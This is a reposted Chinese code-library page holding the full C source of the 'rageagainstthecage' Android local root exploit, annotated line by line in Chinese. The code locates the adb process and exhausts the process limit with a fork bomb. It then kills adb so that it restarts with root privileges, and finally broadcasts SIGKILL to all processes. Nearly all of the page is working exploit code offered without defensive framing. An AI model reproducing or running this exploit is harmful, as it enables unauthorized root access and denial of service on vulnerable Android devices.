首页 > 代码库 > 【转载】rageagainstthecage.c源码以及注释



//头文件包含 #include <stdio.h> #include <sys/types.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <string.h> #include <signal.h> #include <stdlib.h>   //输出错误消息后退出程序 void die(const char *msg) {     perror(msg);     exit(errno); }   //搜索ADB进程,返回其PID,没有找到时返回0 pid_t find_adb() {     char buf[256];     int i = 0, fd = 0;     pid_t found = 0;    //初始化为0,如果没有找到adb将一直保持0值       //遍历进程ID的有效范围     for (i = 0; i < 32000; ++i)      {         //拼接字符串"/proc/<PID>/cmdline"         sprintf(buf, "/proc/%d/cmdline", i);           //打开失败,进程不存在或无权访问         if ((fd = open(buf, O_RDONLY)) < 0)         {             //跳过这个PID,继续下一轮循环             continue;         }   //end if           //buf填0         memset(buf, 0, sizeof(buf));           //读取进程的命令行         read(fd, buf, sizeof(buf) - 1);           //关闭进程         close(fd);           //在命令行中查找"/sbin/adb"         if (strstr(buf, "/sbin/adb"))          {             //找到了"/sbin/adb"则说明找到了adb进程,返回找到的PID             found = i;             break;         }   //end if     }   //end for       //返回找到的PID或0值     return found; }   //重启adb进程,参数为当前adb进程的PID void restart_adb(pid_t pid) {     //直接杀死进程(sig = SIGKILL)     kill(pid, 9); }   //等待具有root权限的adb进程 //参数为原有adb进程的PID void wait_for_root_adb(pid_t old_adb) {     pid_t p = 0;       //死循环,只能由里面的break跳出     for (;;)      {         //搜索adb进程         p = find_adb();           //找到了adb进程,并且不是原来那个旧的adb进程         if (p != 0 && p != old_adb)         {             //退出循环             break;         }           //休息1秒,防止大量占用CPU         sleep(1);       }   //end for       //休息5秒,等待新的adb进程初始化完毕     sleep(5);       //将SIGKILL广播给系统中的所有进程     kill(-1, 9); }   //程序入口点 int main(int argc, char **argv) {     pid_t adb_pid = 0, p;     int pids = 0, new_pids = 1;     int pepe[2];     char c = 0;     struct rlimit rl;       //启动时显示的版本与版权信息     printf(" CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n");     printf(" checking NPROC limit ...\n");       //获取当前进程可以创建的最大子进程数量     if (getrlimit(RLIMIT_NPROC, &rl) < 0)     {         //失败时输出消息退出         die("[-] getrlimit");     }       //检查是否有最大子进程数量限制     if (rl.rlim_cur == RLIM_INFINITY)      {         //当没有最大子进程数量限制时,不执行exploit,否则将导致系统崩溃         printf("[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n");         exit(1);     }       //输出最大子进程数量软性限制和硬性限制     printf("[+] RLIMIT_NPROC={%lu, %lu}\n", rl.rlim_cur, rl.rlim_max);     printf(" Searching for adb ...\n");       //查找adb进程     adb_pid = find_adb();       //检查是否找到了adb进程     if (!adb_pid)     {         //没有找到时直接退出         die("[-] Cannot find adb");     }       //输出adb进程的PID     printf("[+] Found adb as PID %d\n", adb_pid);       //输出一大堆废话     printf(" Spawning children. Dont type anything and wait for reset!\n");     printf("\n If you like what we are doing you can send us PayPal money to\n"            " 7-4-3-C@web.de so we can compensate time, effort and HW costs.\n"            " If you are a company and feel like you profit from our work,\n"            " we also accept donations > 1000 USD!\n");     printf("\n adb connection will be reset. restart adb server on desktop and re-login.\n");       //休息5秒,防止当前的adb进程没有完全初始化     sleep(5);       //如果在父进程中(已有子进程)     if (fork() > 0)     {         //退出         exit(0);     }       //创建一个新的进程组     setsid();       //创建管道     pipe(pepe);            //如果在子进程中     if (fork() == 0)      {         //关闭输入管道         close(pepe[0]);           //死循环,直到满足条件时退出进程         for (;;)          {             //如果是子进程             if ((p = fork()) == 0)              {                 //直接退出                 exit(0);             }              else if (p < 0)     //创建进程失败,说明已达到进程数最大值             {                 //确保代码只执行一次,防止多个进程反复输出信息                 if (new_pids)                  {                     printf("\n[+] Forked %d childs.\n", pids);                     new_pids = 0;                     //在输出管道中写入一个字节,然后关闭管道                     //相当于通知顶级父进程fork炸弹完成                     write(pepe[1], &c, 1);                     close(pepe[1]);                 }             }              else              {                 //进程总数+1                 ++pids;             }         }     }       //关闭输出管道     close(pepe[1]);       //从输入管道中读一个字符,用来等待前面创建的子进程到达最大值     read(pepe[0], &c, 1);       //重启adb     restart_adb(adb_pid);       //在adb重启完以前,再创建一个子进程,占用刚释放出的进程空位     if (fork() == 0)      {         //子进程里继续开子进程,保证进程空位被占满         fork();           //无限休眠,永不退出         for (;;)         {             sleep(0x743C);         }     }       //等待具有root权限的adb启动     wait_for_root_adb(adb_pid);       //执行完毕     return 0; }

